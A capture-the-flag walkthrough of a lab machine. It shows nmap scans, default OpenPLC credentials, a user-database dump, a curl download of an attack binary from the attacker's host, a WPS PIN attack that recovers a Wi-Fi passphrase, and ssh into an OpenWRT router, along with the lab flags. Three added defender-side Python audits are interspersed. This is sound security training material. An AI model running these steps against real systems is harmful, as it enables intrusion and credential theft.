Wifinetic Two - Walkthrough

WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of CVE-2021-31630. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running OpenWRT and gain a root shell via its web interface.

Reconnaissance

During the initial phase, the goal is to discover exposed services, versions, and quick wins that shape the attack surface.

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.7 -oG allPorts

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

sudo nmap -p22,8080 -sCV 10.10.11.7 -oN targeted

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18

The web service on 8080 appears to be an OpenPLC interface (Werkzeug/Python stack). We’ll keep a visual note of the target interface for later correlation.


Enumeration

At this stage, we dig into each exposed service to extract actionable details.

  • OpenPLC on port 8080 suggests common defaults and publicly documented issues.
  • Try known/default creds when appropriate for lab environments: openplc:openplc.
  • Relevant references for the OpenPLC RCE (CVE-2021-31630):

These indicate a path to remote code execution on the OpenPLC web interface.

Foothold

Obtain the initial shell by leveraging the OpenPLC RCE to execute commands on the host. Once a foothold is established, stabilize the shell and validate basic context.

cat /root/user.txt

User flag: 5962b4c07d2a287964cb03c07b58fe5a

Post-Exploitation

With a working shell, focus on internal discovery and preparing for escalation or lateral movement.

  • Upgrade TTY: Improve interactivity following the HackTricks TTY upgrade guide.
  • Application Artifacts: Inspect app directories for configs, databases, and credentials.

ls
active_program  lib             openplc.py   scripts       webserver.py
core            monitoring.py   openplc.pyc  static
dnp3.cfg        monitoring.pyc  pages.py     st_files
iec2c           openplc.db      pages.pyc    st_optimizer
file openplc.db
openplc.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 507, database pages 10, cookie 0xc, schema 4, UTF-8, version-valid-for 507
sqlite3 openplc.db
sqlite> .tables
Programs   Settings   Slave_dev  Users
sqlite> .schema Users
CREATE TABLE IF NOT EXISTS "Users" (
	`user_id`	INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	`name`	TEXT NOT NULL,
	`username`	TEXT NOT NULL UNIQUE,
	`email`	TEXT,
	`password`	TEXT NOT NULL,
	`pict_file`	TEXT
);
sqlite> select * from Users;
10|OpenPLC User|openplc|[email protected]|openplc|
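A defender-side check that follows from this finding (an added example, not part of the walkthrough or of OpenPLC itself): it rebuilds the Users table in memory from the schema above with constructed rows and flags rows that still carry the default openplc:openplc pair or a password stored in the clear. Pointing audit_db at a real openplc.db path runs the same check against the live file.

```python
import re
import sqlite3

# Constructed in-memory copy of the OpenPLC "Users" table shown above (schema as on the
# page; the e-mail and the second row are made up so the audit has a passing case).
SAMPLE_USERS_SQL = """
CREATE TABLE IF NOT EXISTS "Users" (
    `user_id`   INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
    `name`      TEXT NOT NULL,
    `username`  TEXT NOT NULL UNIQUE,
    `email`     TEXT,
    `password`  TEXT NOT NULL,
    `pict_file` TEXT
);
INSERT INTO Users VALUES (10, 'OpenPLC User', 'openplc', 'user@example.com', 'openplc', NULL);
INSERT INTO Users VALUES (11, 'Operator', 'operator', NULL, '$2b$12$placeholder.not.a.real.bcrypt.hash', NULL);
"""

# Default credential pair OpenPLC ships with (and the one the walkthrough used).
DEFAULT_CREDS = {("openplc", "openplc")}
# Accepted "not plaintext" shapes: bcrypt, sha-crypt ($5$/$6$), or a bare hex digest.
HASH_RE = re.compile(r"^(\$2[aby]\$\d\d\$|\$[56]\$|[0-9a-f]{40,128}$)")

def audit_users(conn):
    """Return [(username, [issue, ...])] for every risky row in the Users table."""
    findings = []
    for username, password in conn.execute("SELECT username, password FROM Users"):
        issues = []
        if (username, password) in DEFAULT_CREDS:
            issues.append("default-credentials")
        if not HASH_RE.match(password or ""):
            issues.append("plaintext-password")
        if issues:
            findings.append((username, issues))
    return findings

def audit_db(path=":memory:", bootstrap_sql=None):
    """Open an openplc.db by path; with no path, build the constructed sample in memory."""
    conn = sqlite3.connect(path)
    try:
        if path == ":memory:":
            conn.executescript(bootstrap_sql or SAMPLE_USERS_SQL)
        return audit_users(conn)
    finally:
        conn.close()
```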

If wireless interfaces are present, evaluate whether Wi-Fi access can expand reach or enable router targeting (common in IoT/ICS lab setups). Reference: HackTricks WiFi Pentesting

root@attica03:/opt/PLC/OpenPLC_v3/webserver# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
	last seen: 4438.704s [boottime]
	TSF: 1712316111136774 usec (19818d, 11:21:51)
	freq: 2412
	beacon interval: 100 TUs
	capability: ESS Privacy ShortSlotTime (0x0411)
	signal: -30.00 dBm
	last seen: 0 ms ago
	Information elements from Probe Response frame:
	SSID: plcrouter
	Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
	DS Parameter set: channel 1
	ERP: Barker_Preamble_Mode
	Extended supported rates: 24.0 36.0 48.0 54.0
	RSN:	 * Version: 1
		 * Group cipher: CCMP
		 * Pairwise ciphers: CCMP
		 * Authentication suites: PSK
		 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
	Supported operating classes:
		 * current operating class: 81
	Extended capabilities:
		 * Extended Channel Switching
		 * SSID List
		 * Operating Mode Notification
	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Response Type: 3 (AP)
		 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
		 * Manufacturer:
		 * Model:
		 * Model Number:
		 * Serial Number:
		 * Primary Device Type: 0-00000000-0
		 * Device name:
		 * Config methods: Label, Display, Keypad
		 * Version2: 2.0
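The scan output above is what an audit of the wireless estate would consume; as an added example (not from the walkthrough or from the iw tool), this parser turns `iw dev ... scan` text into per-BSS records and lists every AP that advertises WPS in state 2 (Configured), which is the condition that let the PIN exchange above succeed. The sample scan is a constructed abridgement of the output above plus a second, WPS-free AP.

```python
import re

# Constructed sample: abridged copy of the scan above plus a second, WPS-free BSS.
SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
\tSSID: plcrouter
\tRSN:\t * Version: 1
\t\t * Authentication suites: PSK
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * Config methods: Label, Display, Keypad
BSS 02:00:00:00:02:00(on wlan0)
\tSSID: office-wpa2
"""
BSS_RE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})")

def parse_scan(text):
    """Parse iw scan output into one dict per BSS with the fields the WPS audit needs."""
    aps, section = [], None
    for line in text.splitlines():
        m = BSS_RE.match(line)
        if m:
            aps.append({"bssid": m.group(1), "ssid": None, "wps": False,
                        "wps_state": None, "config_methods": []})
            section = None
            continue
        if not aps:
            continue
        cur, item = aps[-1], line.strip()
        if item.startswith(("WPS:", "RSN:")):
            section = item[:3]          # the first "* key: value" item shares the header line
            cur["wps"] |= (section == "WPS")
            item = item[4:].strip()
        elif not item.startswith("*"):  # any other top-level field ends the IE block
            section = None
            if item.startswith("SSID:"):
                cur["ssid"] = item[5:].strip()
            continue
        key, val = [s.strip() for s in item.lstrip("* ").partition(":")[::2]]
        if section == "WPS" and key == "Wi-Fi Protected Setup State":
            cur["wps_state"] = val
        elif section == "WPS" and key == "Config methods":
            cur["config_methods"] = [v.strip() for v in val.split(",")]
    return aps

def wps_findings(text):
    """APs advertising WPS as Configured; the fix is to disable WPS on the router."""
    return [(ap["bssid"], ap["ssid"], ap["config_methods"]) for ap in parse_scan(text)
            if ap["wps"] and (ap["wps_state"] or "").startswith("2")]
```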

Privilege Escalation

If the target environment relies on a nearby AP/router (e.g., OpenWRT), obtaining wireless credentials can provide a route to higher-privileged components or management interfaces.

Prepare tooling (OneShot) and staging. On the attacking host, build OneShot-C and serve the binary over HTTP; on the target, fetch it and make it executable:

git clone https://github.com/nikita-yfh/OneShot-C.git
cd OneShot-C
make
python3 -m http.server 80
root@attica03:/opt/PLC/OpenPLC_v3/webserver# curl http://10.10.14.52/oneshot -o oneshot
root@attica03:/opt/PLC/OpenPLC_v3/webserver# chmod +x oneshot

Validate interface state and attempt the WPS attack to derive the PSK:

ip a s wlan0
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:/opt/PLC/OpenPLC_v3/webserver# ./oneshot -b 02:00:00:00:01:00 -K -i wlan0
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: a0d569681ac26464c06619c6f4952ff1
[*] Building Message M2
[P] PKR: 0d5d...
[P] PKE: f831...
[P] Authkey: 2f82...
[*] Received WPS Message M3
[P] E-Hash1: e0af...
[P] E-Hash2: 465c...
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter

Generate a working network profile and attempt association:

wpa_passphrase plcrouter NoWWEDoKnowWhaTisReal123! > config
cat config
network={
	ssid="plcrouter"
	#psk="NoWWEDoKnowWhaTisReal123!"
	psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
wpa_supplicant -B -c config -i wlan0
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
nl80211: Could not set interface 'p2p-dev-wlan0' UP
nl80211: deinit ifname=p2p-dev-wlan0 disabled_11b_rates=0
p2p-dev-wlan0: Failed to initialize driver interface
p2p-dev-wlan0: CTRL-EVENT-DSCP-POLICY clear_all
P2P: Failed to enable P2P Device interface
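The hex psk that wpa_passphrase wrote into the profile is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt (4096 rounds, 32 bytes), so the hex value is as sensitive as the passphrase itself and the profile must be protected as a secret even after the #psk comment is stripped. As an added example (not from the walkthrough or from wpa_supplicant), the code below derives that value, checks a profile for consistency, and renders one without the plaintext comment; the constructed PAGE_PROFILE copies the block above, and the IEEE 802.11 Annex test vector ("password" / "IEEE") is used as a known answer.

```python
import hashlib
import re

# Constructed copy of the wpa_passphrase profile shown above.
PAGE_PROFILE = """\
network={
\tssid="plcrouter"
\t#psk="NoWWEDoKnowWhaTisReal123!"
\tpsk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
"""

def wpa_psk(ssid, passphrase):
    """WPA/WPA2-Personal PSK: PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()

# Matches the three lines wpa_passphrase emits: ssid="..", #psk="..", psk=<64 hex>.
FIELD_RE = re.compile(r'^\s*(#?psk|ssid)=(?:"([^"]*)"|([0-9a-fA-F]{64}))\s*$', re.M)

def parse_profile(text):
    """Pull ssid / #psk / psk out of a wpa_supplicant network block."""
    fields = {}
    for key, quoted, hexval in FIELD_RE.findall(text):
        fields[key] = quoted if quoted else hexval
    return fields

def check_profile(text):
    """True when the hex psk matches the commented passphrase for the block's SSID."""
    f = parse_profile(text)
    missing = {"ssid", "#psk", "psk"} - set(f)
    if missing:
        raise ValueError("profile lacks " + ", ".join(sorted(missing)))
    return wpa_psk(f["ssid"], f["#psk"]) == f["psk"].lower()

def render_profile(ssid, passphrase, keep_plaintext=False):
    """Emit the block wpa_passphrase produces, by default without the plaintext comment."""
    lines = ["network={", f'\tssid="{ssid}"']
    if keep_plaintext:
        lines.append(f'\t#psk="{passphrase}"')
    lines += [f"\tpsk={wpa_psk(ssid, passphrase)}", "}"]
    return "\n".join(lines) + "\n"
```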

Manually assign an IP (lab context) and pivot to the router's management plane (OpenWRT):

ifconfig wlan0 192.168.1.7 netmask 255.255.255.0
ssh [email protected]
cat root.txt

Root flag: 33445bbba1381eb24ca2d19d0c51fa0d